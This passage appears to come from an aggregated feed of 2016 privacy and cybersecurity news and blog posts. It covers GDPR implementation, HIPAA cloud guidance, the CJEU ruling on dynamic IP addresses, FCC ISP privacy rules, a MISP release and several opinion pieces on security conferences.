  • Data Protection Officer (“DPO”). The participants discussed the need for a flexible interpretation of the criteria that will trigger the obligation for a data controller to appoint a DPO, the requirements regarding the designation of the DPO, conflicts of interests and the main duties of the data controller or data processor regarding the DPO. Amongst other topics, the participants of the Fablab discussed the following points:
    • the location of the DPO (i.e., whether the DPO can be located outside of the EU);
    • the nature of the DPO’s liability (i.e., civil or criminal liability); and
    • whether a company that has voluntarily appointed a DPO should be subject to the provisions of the GDPR applicable to DPOs.
  • Data Portability. The participants discussed several general concerns with respect to this newly introduced right; in particular:
    • the scope of the data portability right (i.e., which types of personal data are covered by such right);
    • the degree of investment that is expected from data controllers to comply with such right;
    • the types of data that individuals would be most interested in; and
    • how to ensure interoperability between systems to allow data controllers to share personal data between them.
  • Data Protection Impact Assessment (“DPIA”) Risks. The participants discussed the risks and benefits of DPIAs, and called for greater clarity on the circumstances in which a DPIA is required.
  • Certification. The discussion focused on the four essential elements of the certification mechanisms under the GDPR; in particular:
    • The most relevant models to develop privacy certification mechanisms in the EU. The participants agreed that, ideally, there should be a uniform and well-known European certification scheme guaranteeing the level of uniformity and high standards.
    • The accreditation procedure and the roles and obligations of accreditation and certification bodies, as well as data protection authorities.
    • The main elements of a certification scheme, including a common and transparent level of evaluation and a clear focus on privacy instead of IT security.
    • An effective and meaningful certification procedure. The participants discussed potential threats and recommended procedures for mitigation of these threats with respect to the certification mechanism (e.g., consequences of a failure to certify).

The Working Party will organize another FabLab workshop in 2017 to discuss other operational and practical issues relating to the implementation of the GDPR.

HHS Releases Guidance on HIPAA and Cloud Computing

Earlier this month, the Department of Health and Human Services’ Office for Civil Rights issued guidance (the “Guidance”) for HIPAA-covered entities that use cloud computing services involving electronic protected health information (“ePHI”).

The Guidance makes clear that covered entities and business associates may use a cloud service to store or process ePHI, provided that the covered entity or business associate enters into a HIPAA-compliant business associate contract or agreement (“BAA”) with the cloud services provider (“CSP”). The BAA must establish the permitted and required uses and disclosures of ePHI, and require the BAA to appropriately safeguard ePHI, including by implementing the requirements of the HIPAA Security Rule. The BAA also must require the CSP to report to the covered entity or business associate whose ePHI it maintains any security incidents of which it becomes aware. The parties, however, are free to define the level of detail, frequency or format of security incident reports.

The Guidance also clarifies that CSPs do not fall within the conduit exception to the HIPAA Rules, because the conduit exception is limited to entities that transmit, and in the process only have transient access to, PHI. Unlike mere conduits, CSPs maintain ePHI for storage purposes and have “more persistent access to the ePHI.” Additionally, the Guidance permits health care providers to use mobile devices to access cloud-stored ePHI, provided that appropriate physical, administrative and technical safeguards, as well as appropriate BAAs, are in place to protect the ePHI’s confidentiality, integrity and availability. The Guidance also permits covered entities and business associates to use CSPs that store ePHI on servers outside of the U.S., but highlights that entities using CSPs to maintain ePHI outside the U.S. should consider the risks associated with the country where the cloud server is located.

Finally, the Guidance notes that, pursuant to the HIPAA Security Rule, CSPs are directly liable for failing to safeguard ePHI as well as for impermissible use or disclosure of ePHI. Although the HIPAA Rules do not require CSPs to provide documentation or allow auditing of their security practices, a BAA or other contractual agreement may impose such obligations.

Federal Regulators Propose New Cybersecurity Rule for Big Banks

On October 19, 2016, the Federal Deposit Insurance Corporation (“FDIC”), the Federal Reserve System (the “Fed”) and Office of the Comptroller of the Currency issued an advance notice of proposed rulemaking suggesting new cybersecurity regulations for banks with assets totaling more than $50 billion (the “Proposed Standards”).

The Proposed Standards address five categories of cybersecurity: cyber risk governance; cyber risk management; internal dependency management; external dependency management; and incident response, cyber resilience and situational awareness. The Proposed Standards would require covered entities to develop written, board-approved cybersecurity strategies to hold senior management accountable and incorporate procedures for independent risk management reporting to the company’s chief risk officer. Covered entities would also be required to define internal and external cyber risks and develop resiliency plans to ensure continued operation of critical business functions during a cyber incident.

The Proposed Standards include a two-tiered system that establishes more stringent requirements for systems of those covered entities that are deemed “critical to the financial sector.” Under these more stringent requirements, covered entities would be obligated to implement the “most effective, commercially available controls” on sector-critical systems and establish a test-validated two-hour time period for such systems to “recover from a disruptive, corruptive, or destructive cyber event.”

The Proposed Standards would apply to companies with total consolidated assets of at least $50 billion, as well as to Fed-supervised non-bank financial companies, financial market infrastructures and financial market utilities (as designated by the Financial Stability Oversight Council) and third parties who provide services to these firms. Community banks would not be subject to the Proposed Standards. FDIC Chairman Martin J. Gruenberg released a statement praising the issuance of the Proposed Standards, stating, “The enhanced standards for large and interconnected entities would be aimed at increasing their operational resilience and reducing the impact on the financial system of a cyber event experienced by one of these entities.”

Comments on the Proposed Standards are due January 17, 2017.

CJEU Rules That Dynamic IP Addresses Are Personal Data

On October 19, 2016, the Court of Justice of the European Union (the “CJEU”) issued its judgment in Patrick Breyer v. Bundesrepublik Deutschland, following the Opinion of Advocate General Manuel Campos Sánchez-Bordona on May 12, 2016. The CJEU followed the Opinion of the Advocate General and declared that a dynamic IP address registered by a website operator must be treated as personal data by that operator to the extent that the user’s Internet service provider (“ISP”) has – and may provide – additional data that in combination with the IP address that would allow for the identification of the user.

The case arose in 2008 when a German citizen brought an action before the German courts seeking an injunction to prevent websites, operated by the Federal German Institutions, from registering and storing his IP addresses. Most of these websites store information on all access operations in logfiles (including the IP address of the computer from which access was sought, and the date and time when a website was accessed) for the purposes of preventing cyber attacks and making it possible to prosecute ‘pirates.’ The German citizen’s claim was initially rejected by the court of first instance. The claim was granted in part, however, by the court of appeals. Subsequently, both parties appealed the decision to the German Federal Court of Justice.

The German Federal Court of Justice has suspended the proceedings and referred the two following questions to the CJEU:

  • Whether a dynamic IP address (i.e., an IP address which is different each time there is a new connection to the Internet) registered by an online media services provider (here, the German institutions) is personal data within the meaning of Article 2(a) of the EU Data Protection Directive, when only a third party (the ISP) has the additional information necessary to identify the website user.
  • Whether the ‘legitimate interest’ legal basis under Article 7(f) of the EU Data Protection Directive is contrary to a provision of the German Telemedia Act, which is interpreted by most German legal commentators as preventing the storage of personal data after the consultation of online media in order to guarantee the security and continued proper functioning of those media. According to that interpretation, personal data must be deleted at the end of the consultation period, unless the data is required for billing purposes.

The CJEU gave a positive reply to both questions. In regards to the first question, the CJEU noted that there appears to be legal channels in Germany enabling the online media services provider to contact the competent authority – in particular, in the event of cyber attacks – so that the competent authority may take the steps necessary to obtain from the ISP additional information on the website user and subsequently bring criminal proceedings. In other words, the online media services provider would have the means, which may likely reasonably be used, to identify the website user – with the assistance of third parties – on the basis of the IP addresses stored. Consequently, the CJEU ruled that the dynamic IP address of a website user is personal data, with respect to the website operator, if that operator has the legal means allowing it to identify the user concerned with additional information about that user which is held by the ISP.

In regards to the second question, the CJEU ruled that the German legislation, as interpreted by most legal commentators, excludes the possibility to perform the ‘legitimate interest’ test (i.e., in the present case, to balance the objective of ensuring the general operability of the online media against the interests or fundamental rights of website users). In this respect, the CJEU emphasized that German Federal Institutions, which provide online media services, may have a legitimate interest in ensuring the continued functioning of their websites and thus in storing certain user personal data in order to protect themselves against cyber attacks.

The German Federal Court of Justice is now required to decide on the dispute itself.

View the full text of the judgment of the CJEU. For a summary, please see the press release of the CJEU.

California AG Announces Launch of Online CalOPPA Reporting Form

On October 14, 2016, California Attorney General Kamala D. Harris announced the release of a publicly available online form that will enable consumers to report potential violations of the California Online Privacy Protection Act (“CalOPPA”). CalOPPA requires website and mobile app operators to post a privacy policy that contains certain specific content.

The form asks consumers to state the name of the company being reported and indicate whether the privacy policy (1) is missing or inapplicable, (2) is difficult to locate, (3) is incomplete, (4) has been violated, or (5) has failed to provide notice of a material change. The form enables consumers to provide additional explanation for the alleged violation of CalOPPA as well as any supporting documentation, such as screenshots of the company’s website or app, or correspondence with the company. The form also requests the consumer’s contact information but notes that providing such information is entirely optional.

In addition to the online form, the California Attorney General’s Office announced that it will partner with the Usable Privacy Policy Project at Carnegie Mellon University to develop a tool that will examine differences in a mobile app’s privacy policy and its actual data collection and sharing practices.

In the press release announcing the online form, Attorney General Harris stated, “In the information age, companies doing business in California must take every step possible to be transparent with consumers and protect their privacy.” She further noted that it is critical to “implement robust safeguards on what information is shared online and how.”

CIPL and Telefónica Call for Action on New Approaches to Data Transparency

Recently, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP, a privacy and information policy think tank based in Brussels, London and Washington, D.C., and Telefónica, one of the largest telecommunications company in the world, issued a joint white paper on Reframing Data Transparency (the “white paper”). The white paper was the outcome of a June 2016 roundtable held by the two organizations in London, in which senior business leaders, Data Privacy Officers, lawyers and academics discussed the importance of user-centric transparency to the data driven economy.

The roundtable and white paper build upon a number of current initiatives, including the work of the Data Transparency Lab; the 2015 EU-U.S. Privacy Bridges Project, which, among other topics, explored the issue of data transparency; as well as the new European General Data Protection Regulation, which includes enhanced transparency obligations for organizations. As reflected in the white paper, the participants at the roundtable agreed that a new, user-centric conception of transparency represents a multidimensional, multidisciplinary and multistakeholder challenge that is essential to effectively protect individuals and enable digital trust, innovation and beneficial uses of personal data.

The issues explored during the roundtable and in the white paper include the following:

  • The transparency deficit in the digital age. There is a growing gap between traditional, legal privacy notices and user-centric transparency that is capable of delivering understandable and actionable information concerning an organization’s data use policies and practices, including why it processes data, what the benefits are to individuals and society, how it protects the data and how users can manage and control the use of their data.
  • The impact of the transparency deficit. The transparency deficit undermines customer trust and customers’ ability to participate more effectively in the digital economy.
  • Challenges of delivering user-centric transparency. In a connected world where there may be no direct relationship between companies and their end users, both transparency and consent as a basis for processing are particularly challenging.
  • Transparency as a multistakeholder challenge. Transparency is not solely a legal issue, but a multistakeholder challenge, which requires engagement of regulators, companies, individuals, behavioral economists, social scientists, psychologists and user experience specialists.
  • The role of data protection authorities (“DPAs”). DPAs play a key role in promoting and incentivizing effective data transparency approaches and tools.
  • The role of companies. Data transparency is a critical business issue because transparency drives digital trust as well as business opportunities. Organizations must innovate on how to deliver user-centric transparency. Data driven companies must research and develop new approaches to transparency that explain the value exchange between customers and companies and the companies’ data practices, and create tools that enable their customers to exercise effective engagement and control.
  • The importance of empowering individuals. It is crucial to support and enhance individuals’ digital literacy, which includes an understanding of the uses of personal data and the benefits of data processing, as well as knowledge of relevant privacy rights and the data management tools that are available to them. Government bodies, regulators and industry should be involved in educating the public regarding digital literacy. Such education should take place in schools and universities, and through consumer education campaigns. Transparency is the foundation and sine qua non of individual empowerment.
  • The role of behavioral economists, social scientists, psychologists and user experience specialists. Experts from these disciplines will be crucial in developing user-centric transparency and controls.

UK ICO Seeks Personal Liability for Directors

On October 13, 2016, Elizabeth Denham, the UK Information Commissioner, suggested that directors of companies who violate data protection laws should be personally liable to pay fines at a House of Commons Public Bill Committee meeting when discussing the latest draft of the Digital Economy Bill (the “Bill”). The Bill is designed to enable businesses and individuals to access fast, digital communications services, promote investment in digital communications infrastructure and support the “digital transformation of government.” Measures to improve the digital landscape contained in the Bill include the introduction of a new Electronic Communications Code and more effective controls to protect citizens from nuisance calls. More controversially, however, the Bill also contains provisions both enabling and controlling the sharing of data between public authorities and private companies.

Responding to a question about so-called “nuisance calls,” Denham agreed with a Member of Parliament’s suggestion that the directors of companies found to have seriously breached data protection laws should be personally liable for the fines imposed on their companies. It was suggested that this enforcement would allow the Information Commissioner’s Office (the “ICO”) to recoup a much larger proportion of the £4 million it has issued in fines in the last year than it is able to collect at present. Denham suggested that this is, in part, due to a large number of companies that receive fines from the ICO subsequently falling into liquidation.

Currently, the ICO can impose fines of up to £500,000, with the largest fine to date being a £400,000 fine imposed on TalkTalk on October 5, 2016. Further detail on how liability could be imposed on directors was not discussed at the meeting.

In addition, Denham made the following recommendations:

  • to place the ICO’s Direct Marketing Code on a statutory footing;
  • to lower the threshold for harm to an individual at which point a data security breach is considered to have occurred; and
  • to improve transparency when personal data is collected and in respect of safeguards that are in place (e.g., publishing privacy impact assessments).

It was claimed that these measures would provide better protection for the general public. Although Denham welcomed the development of the Digital Economy Bill, she stated that improvements are required before it comes into force.

Improved Efficiency and Centralised Management with new Systems Management

Aerial shot of a group of coworkers discussing notes at a meeting

In today’s digital world internet connected devices have become a part of every aspect of our lives, and as this digital transformation continues, it is imperative that businesses understand the complexities that come with it.

To address this situation, Panda Security present our latest version of Systems Management – the most powerful, scalable and easy-to-use Remote Monitoring and Management (RMM) tool on the market.

The Challenge

Digital transformation brings with it a number of new challenges that business leaders must consider. Adding to the already complex IT environment, some of the challenges businesses face include; the ever increasing number of devices connected to the organisations network, the growing number of remote users, as well as the need to fix problems with greater flexibility.

The growing number of devices used every day in the workplace brings with it the threat of new incidents that disrupt work. Consequently, as these inefficiencies multiply, they add to the IT department’s workload, and affect business management, often resulting in security being overlooked.

The Solution – Greater Automation and Maximum Performance

Systems Management remotely monitors and manages devices from the Cloud so that every IT department can offer a professional service that minimises impact on daily work.

Whats New

The new version of Systems Management gives you maximum performance out-of-the-box. To increase efficiency and grow business for our clients and partners, Systems Management facilitates five pillars.

  • Asset Inventory

  • Device Monitoring
  • Remote Device Management
  • Resolution Tool Support
  • Generated Reports

This version comes with significant new and updated features in response to customer feedback, highlights include:

  • Recommended monitoring policies based on the best practices of clients.
  • New filters to improve management systems – instant visualisation of the network so you can see what you need.
  • New reports for server performance, CPU, memory, and disc performance for the last 30 days, including general averages.
  • Integrates with Microsoft Hyper-V and the new hardware monitors added for VMware ESXi.
  • New maintenance Windows—alerts can now be programmed and silenced.

This new update makes Systems Management a powerful, highly scalable, easy-to-use administration tool that will save users time and money.

The post Improved Efficiency and Centralised Management with new Systems Management appeared first on

G-7 Endorses Best Practices for Bank Cybersecurity

On October 11, 2016, Group of Seven (“G-7”) financial leaders endorsed the Fundamental Elements of Cybersecurity for the Financial Sector (“Best Practices”), a set of non-binding best practices for banks and financial institutions to address cybersecurity threats. The endorsement was motivated by recent large hacks on international banks, including the February 2016 theft of $81 million from the central bank of Bangladesh’s account at the New York Federal Reserve.

The Best Practices are divided into eight elements designed to help financial institutions tailor their cybersecurity practices to their specific operations, the relevant threat landscape, their role in the financial sector and legal and regulatory requirements. The elements include:

  • establishing and maintaining a cybersecurity strategy and framework tailored to specific risks and relevant, applicable laws;
  • defining and facilitating roles and responsibilities of governance personnel (e.g., boards of directors);
  • assessing risks and controls to protect against those risks;
  • establishing systematic monitoring processes to rapidly detect cyber threats and evaluate the effectiveness of existing controls;
  • maintaining response procedures to timely identify, assess and contain a cyber incident and make required notifications;
  • resuming normal operations responsibly with an eye toward continued remediation;
  • sharing reliable cybersecurity information with internal and external stakeholders; and
  • reviewing institutional cybersecurity policies and procedures regularly to address changes in cyber risks and resource allocations, and to amend procedures as necessary based on lessons learned.

The Best Practices emphasize the need for flexibility in the face of ever-evolving cyber threats, and stress that financial institutions should continuously re-assess their cybersecurity strategies and practices to effectively combat such threats.

Federal Reserve Board Chairman Stanley Fisher praised the G-7’s endorsement of the Best Practices, stating that, “The international financial architecture is only as strong as its weakest link and that is why the United States should work with our partners around the world to bolster their information security and resiliency…These elements are a crucial step in further hardening each link in the chain of our global financial system.”

Relevant to my rants

Before I resume my rambling on conferences and presentations, here’s a great article I came across via Tales of the Cocktail, a site you would expect me to link to from my, ahem, travel blog.

This article is specifically about submitting a cocktail seminar to Tales of the Cocktail, but several points in the list of seventeen items apply to a wide variety of events, regardless of topic or venue.

Also, it has been said many times by many people and in many ways- one of the best tips for getting your proposal accepted at any event is to follow the rules. Really, read the rules/guidelines for submission, and follow them.  Also, submit early.  Most event reviewers are volunteers and do it in their spare time, something which gets scarce when the deadline approaches.  Submit early and you’re more likely to get non-bloodshot eyes looking at your paper.



NIST Survey Suggests Online Users Suffer from Security Fatigue

A recent study from the National Institute of Standards and Technology (“NIST”) warns that an overabundance of computer security measures might actually lead users to engage in “risky computing behavior at work and in their personal lives.”

Researchers conducted qualitative interviews with respondents ranging in age from 20 to mid-60s and of various geographic and employment backgrounds, regarding their perception of and beliefs about cybersecurity and online privacy. Researchers found that many respondents were suffering from “security fatigue,” defined as “a weariness or reluctance to deal with computer security.” The feeling of being asked to make more computer security decisions than they were able to manage (e.g., remembering a different password for every website requiring user login) resulted in respondents engaging in higher-risk online behavior, including using the same password for multiple websites and choosing the easiest security option among alternatives. Researchers also found that, in some cases, security fatigue could cause a user to abandon online activity altogether, such as failing to complete an online purchase because he or she felt frustrated with the security measures for creating or accessing an online account.

The study also uncovered a sense of hopelessness among respondents with respect to how they could effectively protect their data given the perceived frequency with which large organizations suffer cyber attacks. Many respondents believed that responsibility for computer security and protecting user data should fall to the entity with which they interact online (e.g., a bank or online retailer).

In a press release, the NIST noted that security fatigue can expose Internet users and the networks they access to security risks and can result in lost customers for businesses. The researchers suggest three ways to alleviate security fatigue and ensure that users follow secure online practices, both in their professional and personal lives:

  • limit the number of security decisions that users must make;
  • simplify users’ ability to choose the right security action; and
  • design for consistent decision making whenever possible.

Researchers intend to conduct additional interviews to further clarify computer security attitudes and behaviors.

Catching IRS fraudsters proves the scale and profitability of impersonation cons

 Fraudsters who posed as IRS officials threatened hardworking Americans with imprisonments for the crime of tax default. Their modus operandi was simple; question victims about defaulting on their tax payments, threaten legal action, arrest, deportation or suspension of business rights, and finally offer an easy way out – a chance to close the case without prosecution for a onetime deposit in a bank account or alternatively getting the bank account details of the victim which were then wiped clean.

Incredible as it may seem, the con was so successful that the kingpin lived a life of 5 star luxury, with fancy cars and hotel stays. In a short span of two years he amassed significant wealth and employed over a 700 people in several call centers across India and the US. Most of these call centers were owned by trusted associates and employed high school graduates or drop outs who they lured with high pay and luxurious lifestyles.

Income earned in dollars was converted into India rupees using illegal money laundering channels called Hawala. All employees were paid in cash. Call center executives were offered incentives based on the income they generated from these frauds, and the ones that performed were even offered a chance to work directly with the kingpin, in his home city of Ahmedabad, Gujarat while being put up in 3 and 4 star hotels.

Fortunately, India takes these crimes seriously, and once reported, Mumbai police detectives over a period of 15 days, went incognito and surveyed these call centers before busting them and arresting over 50 people. All convicted will be tried under the Indian IT act and penal code.

There are however, several countries that do not take action on these crimes as the victims are not citizens of their countries.

Cybercitizen’s are advised to be wary about calls which ask for personal information and money in some form or the other.  

FCC to Vote on Proposed Privacy Rules for Internet Service Providers

On October 27, 2016, the Federal Communications Commission (“FCC”) will vote on whether to finalize proposed rules (the “Proposed Rules”) concerning new privacy restrictions for Internet Service Providers (“ISPs”). The Proposed Rules, which revise previous versions introduced earlier this year, would require customers’ explicit (or “opt-in”) consent before an ISP can use or share a customer’s personal data, including web browsing and app usage history, geolocation data, children’s information, health information, financial information, email and other message contents and Social Security numbers.

In addition to the opt-in requirement, the Proposed Rules address whether ISPs may charge more for their services, or refuse service altogether, if a customer does not consent to the use and sharing of his or her personal information. The Proposed Rules allow an ISP to offer a discount or incentive to a customer who consents, but forbid the ISP from refusing to provide service to a customer who withholds consent. Under the Proposed Rules, the FCC will evaluate discounts and incentives exchanged for customer’s personal data on a case-by-case basis. Additionally, the Proposed Rules require ISPs to inform customers of how their data will be collected, for what purposes it might be used and the entities with whom it is shared. In the event of a breach, the ISP would be required to notify the FCC within seven business days of the breach and customers within 30 days. Breaches affecting more than 5,000 customers would also require notification to the FBI and U.S. Secret Service within seven business days.

In a blog post about the Proposed Rules, FCC Chairman Tom Wheeler noted that they would not apply to websites or apps subject to FTC jurisdiction, even if those websites or apps are owned by an ISP that is subject to the Proposed Rules. Chairman Wheeler wrote, “It’s also important to note that the proposed rules would not prohibit ISPs from using or sharing their customers’ information – they would simply require ISPs to put their customers in the driver’s seat when it comes to those decisions.”

Texas AG Settles Suit with Messaging App Over Children’s Data Practices

On October 3, 2016, the Texas Attorney General announced a $30,000 settlement with mobile app developer Juxta Labs, Inc. (“Juxta”) stemming from allegations that the company violated Texas consumer protection law by engaging in false, deceptive or misleading acts or practices regarding the collection of personal information from children.

The Texas Attorney General alleged that Juxta, the developer of the “Jott” messaging app and other apps for gaming and social media, misled consumers regarding the company’s privacy practices and compliance with privacy laws. According to the Texas Attorney General, Juxta’s apps were previously easy for children of any age to access. Many of the company’s apps offered free children’s games, generating revenue from advertisements and in-app purchases. Personal information was transmitted over these apps, including IP addresses and GPS coordinates, which could be used to pinpoint a child’s location.

Under the terms of the Assurance of Voluntary Compliance (“AVC”), approved by the Travis County District Court, Juxta agreed not to misrepresent its privacy practices regarding the personal information it collects from children under the age of 13, and not to engage in such collection through its apps unless the apps are in compliance with the Children’s Online Privacy Protection Act (“COPPA”). The AVC adopts COPPA’s definition of “Personal Information,” which includes data such as online contact information (such as an instant message user identifier); a photograph, video or audio file that contains a child’s image or voice; geolocation information sufficient to identity street name and name of a city or town; and persistent identifiers that can be used to recognize a user over time and across different websites or line services (e.g., IP addresses or a customer number held in a cookie). Juxta must also develop and maintain an up-to-date and accurate privacy policy that is clear, conspicuous and understandable. This privacy policy must be made prominently available on each of its apps and websites, including a hyperlink to the policy in any areas of its apps or websites that collect personal information from children younger than 13.

Additionally, Juxta is required to develop, implement and maintain procedures to ensure its Jott app does not contain any networks that are likely to predominantly include children under the age of 13. In particular, Juxta must refrain from designating any of its networks as an “Elementary School” network within the State of Texas. In the event Juxta seeks to prevent children under the age of 13 from using its apps or providing personal information, Juxta must implement and maintain reasonable neutral age screening mechanisms that discourage children from falsifying their age. Juxta further agreed to delete within 30 days (1) all personal information of children under 13 in its custody or control, and (2) all personal information in its custody or control regarding members of its “Elementary School” networks.

Toolsmith Release Advisory: Malware Information Sharing Platform (MISP) 2.4.52

7 OCT 2016 saw the release of MISP 2.4.52.
MISP, Malware Information Sharing Platform and Threat Sharing, is free and open source software to aid in sharing of threat and cyber security indicators.
An overview of MISP as derived from the project home page:
  • Automation:  Store IOCs in a structured manner, and benefit from correlation, automated exports for IDS, or SIEM, in STIX or OpenIOC and even to other MISPs.
  • Simplicity: the driving force behind the project. Storing and using information about threats and malware should not be difficult. MISP allows getting the maximum out of your data without unmanageable complexity.
  • Sharing: the key to fast and effective detection of attacks. Often organizations are targeted by the same Threat Actor, in the same or different Campaign. MISP makes it easier to share with and receive from trusted partners and trust-groups. Sharing also enables collaborative analysis, preventing redundant work.
The MISP 2.4.52 release includes the following new features:
  • Freetext feed import: a flexible scheme to import any feed available on Internet and incorporate them automatically in MISP. The feed imported can create new event or update an existing event. The freetext feed feature permits to preview the import and quickly integrates external sources.
  • Bro NIDS export added in MISP in addition to Snort and Suricata.
  • A default role can be set allowing flexible role policy.
  • Functionality to allow merging of attributes from a different event.
  • Many updates and improvement in the MISP user-interface including filtering of proposals at index level.
Bug fixes and improvements include:
  • XML STIX export has been significantly improved to ensure enhanced compatibility with other platforms.
  • Bruteforce protection has been fixed.
  • OpenIOC export via the API is now possible.
  • Various bugs at the API level were fixed.
This is an outstanding project that will be the topic of my next Toolsmith In-depth Analysis.

Cheers...until next time.

Wrong About Conferences, part 3

Thought I’d get tired of this topic?  No way, I’m just getting warmed up.

Today’s installment continues on the events themselves:

A lot of people complain about the commercialization, the sales pitches, the circus-like atmosphere of some vendor areas.  I’m not a big fan of these things myself (OK, I loathe them), I prefer to engage with vendors in a rational manner- but whether you are buying antivirus, SIEM, a new car, or a washing machine, expect the sales hype.  If you are like me you’ll ignore the excesses and gravitate towards the companies who bring engineers and maybe even support personnel to accompany the sales and marketing teams  to shows so that they can answer hard questions and help existing customers.  And if you aren’t buying, or curious about the tech, avoid those parts of the events altogether (or as much as the venue allows).

The same events which have the big vendorfests are often the best for meeting people for quiet meaningful conversations- not at the show but nearby, away from the mayhem.  If thousands of people go to the event, there may be folks there you want to talk to, you don’t have to meet at the conference.  If you are going to do this, make appointments.  You will not just run into folks and have time to chat.  And “I’ll meet you in the lobby” isn’t good enough, especially at sprawling complexes like the Moscone Center in San Francisco, the Las Vegas Convention Center, and other huge venues.

The flip side of over commercialization are the community events with little or no advertising and sales.  They are a great relief to many of us who suffer the excesses at commercial shows, but they don’t generate leads for the sponsors so it can be hard to pull in the funding needed for the event.  These events often get funded primarily through ticket sales because someone has to pay.  A lot of companies will provide sponsorship for visibility and the good of the community, but there are a lot of community conferences and not enough money for all of them.

The realms of for-profit, not-for-profit, and non-profit are too convoluted a topic for this series, bet whether people want to make money from an event or not, they want people to like the event.

It is also worth mentioning the size of events.  Everyone want to go to the cool events, and so some grow until they aren’t what they used to be, and a lot of folks complain about this.  When I hear such complaints I am reminded of what the sage Yogi Berra said many years ago about Rigazzi’s in St. Louis:

“Nobody goes there anymore, it’s too crowded”

But if events cap attendance and demand continues to grow they get accused of being exclusionary by some.  What’s a conference organizer to do?

You’ll note I’ve avoided naming specific events, although I’m sure most of you have assigned names to several things I’ve mentioned.  I would, however, like to use one specific group as an example, an example that could be applied to many other groups and events.  DC303, the Denver area DEF CON group, is well known and very active, and I’ve heard them accused of being “cliquish”  and excluding people from activities and events.  I would like to make two points abut DC303 (note, I am *not* a 303 member):

First, as with most organizations, some things are limited to members.  I can’t expect to toss my kayak in the bay and be welcomed down at the yacht club.  Some things are more open than others- and some do require an invitation, which leads to my second point:

My first interaction with the 303 crew was in July of 2009, at the first BSides Las Vegas.  I knew almost no one other than from a few online exchanges, they certianly didn’t know me.  And it didn’t matter, I showed up and got to work as did several others- and many of us became friends.  That’s it, three simple steps: show up, participate, and be accepted.  If you skip step two you probably won’t make it to step three.  This applies at your local LUG or ISSA chapter as much as to 303 or pretty much any other entity.

Next week I’ll change topics a bit and babble about what’s wrong with presentations, speakers, and who knows what else.



Department of Defense Finalizes Rule for Cyber Incident Reporting

On October 4, 2016, the U.S. Department of Defense (“DoD”) finalized its rule implementing the mandatory cyber incident reporting requirements for defense contractors under 10 U.S.C. §§ 391 and 393 (the “Rule”). The Rule applies to DoD contractors and subcontractors that are targets of any cyber incident with a potential adverse impact on information systems and “covered defense information” on those systems.

The Rule leaves unchanged the requirement for reporting cyber incidents to DoD within 72 hours. The Rule, however, expends the requirement to impose a reporting obligation on all subcontractors “that are providing operationally critical support or for which subcontract performance will involve a covered contractor information system.” These subcontractors must report cyber incidents to any higher-tier subcontractor and to the prime contractor. A contractor’s report must contain the assessed impact of the cyber incident, a description of the technique or method used in the incident, a sample of any malicious software involved in the incident and a summary of the compromised information. Defense contractors also must provide the DoD with access to affected information or equipment to enable the DoD to conduct forensic analysis of the impact on DoD information. These requirements apply to all forms of agreements between the DoD and defense companies.

The Rule also modifies eligibility criteria for the voluntary Defense Industrial Base Cybersecurity (“DIB CS”) information sharing program to expand participation in the program. The DIB CS program is designed to facilitate sharing of cyber threat information between DoD and DIB CS participants and improve cybersecurity programs. The program is outside the scope of the mandatory cyber incident reporting requirements.

The Rule will take effect on November 3, 2016.

Wrong About Conferences, part 2

Today let’s start with a look at the conferences and events themselves.  One of the cyclical things I see is dismissing events people don’t like as irrelevant or worse.

“The big commercial cons are irrelevant…” as tens of thousands of people go to them, learn, share and yes, do the business of InfoSec.  The business of InfoSec, it’s so ugly and dirty, oh, and pays tens of thousands of us a living while funding an amazing amount of research.  Maybe they aren’t the places for cutting edge research, especially offensive security stuff, but that’s not their core audience.

Are there excesses? Sure there are.

Are they valuable to a lot of people?  Of course they are.

And very few people are forced to go unless they are paid to do so.

Don’t like it?  Not your scene?  Cool, don’t go.


“That’s just a hacker con, full of criminals…” as thousands or even tens of thousands of people gather to learn, share, and (gasp) maybe even do a little business.  Yeah, we’re all a bunch of criminals, right.  No, almost all of us at hacker cons are trying to make the world more secure.  You may disagree with some methods and opinions, but hacker cons help make us more secure.  Some may not be the best places to learn a lot about policy and compliance issues, or securing global enterprises, but that’s not what they’re about- and some “hacker” cons do cover these topics well.

Are there excesses? Sure there are.

Are they valuable to a lot of people?  Of course they are.

And very few people are forced to go unless they are paid to do so.

Don’t like it?  Not your scene?  Cool, don’t go.

Fifty years ago buffalo Springfield sang “Nobody's right if everybody's wrong”, and that sums up the way I feel about a lot of the con noise, hype, and drama.  Find the events that work for you, contribute to making them better, and avoid the ones that don’t work for you.

There are plenty of things I don’t like about a lot of events, I’m a cranky old man.  I do, however, understand that different events serve different needs and audiences.  That doesn’t excuse hype, lies, and bullshit but no event has a monopoly on that.

More on events in the next few posts.



The Arc of a Data Breach: A 3-Part Series to Make Sure You’re Prepared

Episode 3: Lessons Learned

In the third segment of our 3-part series with Lawline, Lisa J. Sotto, head of our Global Privacy and Cybersecurity practice at Hunton & Williams LLP, discusses the details of the post-mortem following a data breach and the role of boards of directors before, during and after a breach. “We always want to revisit our incident response plan…and make changes to incorporate the lessons learned from a cyber event,” Sotto says. “We seek to ensure senior leadership understands how to prevent these events from happening in the future.”

View the third segment and the presentation materials.

CNIL Provides Update on Compliance Pack Regarding Connected Vehicles

On October 3, 2016, at the Paris Motor Show, the French Data Protection Authority (“CNIL”) reported on the progress of a new compliance pack on connected vehicles. The work was launched on March 23, 2016, and should be finalized in Spring 2017.

The compliance pack on connected vehicles will contain guidelines regarding the responsible use of personal data for the next generation of vehicles. It is currently drafted in cooperation with the automobile industry, innovative companies from the insurance and telecommunications sector, and public authorities.

The CNIL will distinguish between the three following scenarios:

  • “IN -> IN” scenario
    The data collected in the vehicle remains in that vehicle and is not to be shared with the service provider (e.g., an eco-driving solution that processes data directly in the vehicle in order to show eco-driving tips in real time on the vehicle’s dashboard).
  • “IN -> OUT” scenario
    The data collected in the vehicle is shared outside of the vehicle for the purposes of providing a specific service to the individual (e.g., when a pay-as-you-drive contract is purchased from an insurance company).
  • “IN -> OUT -> IN” scenario
    The data collected in the vehicle is shared outside of the vehicle to trigger an automatic action by the vehicle (e.g., in the context of a traffic solution that calculates a new route following a car incident).

The CNIL recalled the following:

  • All data that may be attributed to an identified or identifiable individual (e.g., via the license plate number or the vehicle serial number) qualifies as personal data subject to the French Data Protection Act and the EU General Data Protection Regulation (“GDPR”).  Information on the vehicle condition, the number of miles driven and driving style is personal data to the extent that this information may be attributed to an individual.
